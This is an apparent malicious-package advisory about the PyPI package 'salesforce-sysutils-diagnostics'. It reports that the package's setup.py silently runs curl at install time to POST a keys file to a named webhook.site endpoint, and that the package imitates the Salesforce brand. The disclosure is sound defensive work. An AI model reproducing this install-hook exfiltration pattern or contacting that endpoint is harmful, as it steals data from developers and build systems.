Malicious code in salesforce-sysutils-diagnostics (PyPI)

---

__

Source: amazon-inspector (59e4ce1338f2439a1a5b2d257b96aadaef4a9c2883f6787343856728514bd148)

setup.py unconditionally invokes curl at install time to POST the contents of /tmp/fake-keys.json to https://webhook.site/20ed745d-ee73-4b79-ab06-5b106255c38c, an anonymous request-capture endpoint. stderr is redirected to DEVNULL to suppress install-time output. The package additionally impersonates the Salesforce brand (name 'salesforce-sysutils-diagnostics') with no Author or Home-page metadata in PKG-INFO, consistent with a brand-confusion lure. Any developer or build system that runs pip install salesforce-sysutils-diagnostics will trigger an outbound POST to the attacker-controlled webhook on every install.

Source: kam193 (df69f7ee7e4cb191b719367d5d707c8c244f50c35d1af182e5b9cec73dd1937c)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

---

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

• The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

• The package overrides the install command in setup.py to execute malicious code during installation.